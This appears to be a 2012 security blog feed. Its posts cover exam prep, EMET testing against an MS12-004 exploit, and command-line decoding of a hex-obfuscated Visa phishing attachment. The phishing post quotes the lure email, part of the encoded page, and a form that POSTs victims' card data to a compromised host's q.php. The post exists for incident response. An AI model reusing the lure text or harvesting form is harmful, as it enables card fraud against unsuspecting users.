Incident Response howto

GSE Orlando 2012

twsecblog — Mon, 13 Feb 2012 17:14:58 +0000

I recently passed the GSE written portion. While I did not find any surprises on the test, I did think it was a bit harder then just a combination of the GSEC, GCIH and GCIA into one test.

I’m starting my prep for the two day practical. I’m building my VM’s (Fedora Core 12, Backtrack 4) to setup a lab. My goal is to go through the each learning objective, review some labs from 503 and 504 and finish up with reviewing some of the Hacker Challenge books.

EMET and MS12-004 Protection

twsecblog — Fri, 27 Jan 2012 23:33:45 +0000

Metasploit added an exploit for MS12-004 today. Also, threat post has an article about attackers using this vulnerability. I decided to quickly test EMET against the Metasploit version, which is currently XP SP3 only. My XP SP3 test machine was running IE 6.0.2900.5512.

With my config.xml from my previous posts, you have IE protected. When EMET is enabled, IE crashes during the exploit preventing it from completing. If you do not have EMET setup the exploit seem very reliable with IE6.

If you can not patch a system or there is a 0day out there, EMET will help protect against these types of attacks. It may be possible for attacker to bypass the protections that EMET gives you, but attackers do not seem interested at this point in implementing this level of sophistication.

If I get a chance to find the exploit mentioned in the threat post article I’ll be sure to also test it and update the post.

Converting Hex encoded Javascript to Ascii via Commandline

twsecblog — Thu, 12 Jan 2012 02:09:40 +0000

We all get phishing emails quite often now a days. Therefore, I wanted to post a quick way to deobfuscate hex encoded javascript. Their are many ways to do this, but I wanted a quick way via command line.

My goal, when preforming analysis on phishing emails, is to get the URL out of the code, report it, and block it.

Typical Phishing Email.

Dear Customer,

For security reasons, your card was blocked.

Following an abnormal activity, we saw that someone used the card without

your permission, so to protect you, we blocked the card.

Once you have reactivated your Visa Card records, your card service will

not be interrupted and will continue as normal.

To reactivate your Visa Card download and complete the form attached to

this message.

Note: Failure to verify your records will result in card suspension.

Thank you.

Visa will periodically send you information about site changes and

enhancements.

File attached to email

Converting

In this case, the file was an html attachment to the email. I saved the file and opened it in a text editor. If I had to follow a link to a phishing site, I would have downloaded the page using TOR and wget script..

The javascript below is simply hex encoded.

script language="javascript"
document.write( unescape( '%09%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%3C%74%69%74%6C%65%3E%56%65%72%69%66%69%65%64%20%62%79%20%56%69%73%61%3C%2F%74%69%74%6C%65%3E%0A%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%0A%20%20%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%63%73%73%2F%6E%75%65%76%6F%63%73%73%2E%63%73%73%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%20%0A

To convert it to ascii, remove everything up to the first single quote. The start of the file should begin with the %. I did this using the linux cut command and saved the file as complete-document.htm

#cat html.txt |cut -d ” ‘ ” -f2 >complete-document.htm

%09%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%3C%74%69%74%6C%65%3E%56%65%72%69%66%69%65%64%20%62%79%20%56%69%73%61%3C%2F%74%69%74%6C%65%3E%0A%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%69%73%6F%2D%38%38%35%39%2D%31%22%3E%0A%0A%20%20%3C%6C%69%6E%6B%20%68%72%65%66%3D%22%63%73%73%2F%6E%75%65%76%6F%63%73%73%2E%63%73%73%22%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%20%0A

Now that we have just the hex encoded part of the html, we are going to use a bash tool xdd to convert it.
#cat complete-document.htm |xxd -r -p |less

	Verified by Visa.. (truncated)...

That is it as far as decoding the file, but that is just the start of your Incident response process.

Analysis

Within the decode, you should see either additional links for the victim to follow, or a web form that uses a POST to a website. In this case, you can grep for the words post and get to find out where this data is going.

#cat complete-document.htm |cut -d “‘” -f2 |xxd -r -p |egrep -i ‘post|get’

form name="run.php" action="http://compromised-host.com/imicommerce/images/music/sample/.m/q.php" method="POST" onSubmit="return OnMultiSubmitHandler(optinLang)

Now that you have the URL, you will need to determine if any systems on your network sent information to the website. You should check logs from your:DNS Servers,Firewall, Network Flows, Web Proxy servers and any other network intelligence for connectivity to determine if any users accessed the site.

Remediation

Any system that accessed the site my possibly have malware on it.
If the phish is targeting credentials, the user account should be locked and force to reset passwords.
If the user entered banking information they will need to notify the bank ASAP.

Report the site as compromised to the whois information contact, the security contact of the organization the phishing email is targeting and add it to phishtank.

Prevention

If you have a dns blacklist server or web proxy add the domain to the block list. Be careful if this site is part of a larger site as you will be blocking access to the entire domain.

Creating a log2timeline plugin

twsecblog — Wed, 30 Nov 2011 23:08:26 +0000

I have a new post on the SANS forensics blog. This post covers the process of creating a plugin for the log2timeline tool. Using a step-by-step instruction, I break down each section of the code and how it works. This should be used as a template for creating any plugin, but I cover how to parse an OS X plist.

OSX Lion Window Preservation

twsecblog — Tue, 04 Oct 2011 23:55:18 +0000

My first post on the SANS forensics blog is up! The post covers a new feature in OSX 10.7 (Lion). Lion saves the location of the windows and other data when the application closes. This additional data can be used to supplient your analysis. Mac is continuing to gain market share and we need to start taking a deeper look into this OS to get the most out of our investigations.

For more information about Mac incident response check out my previous post.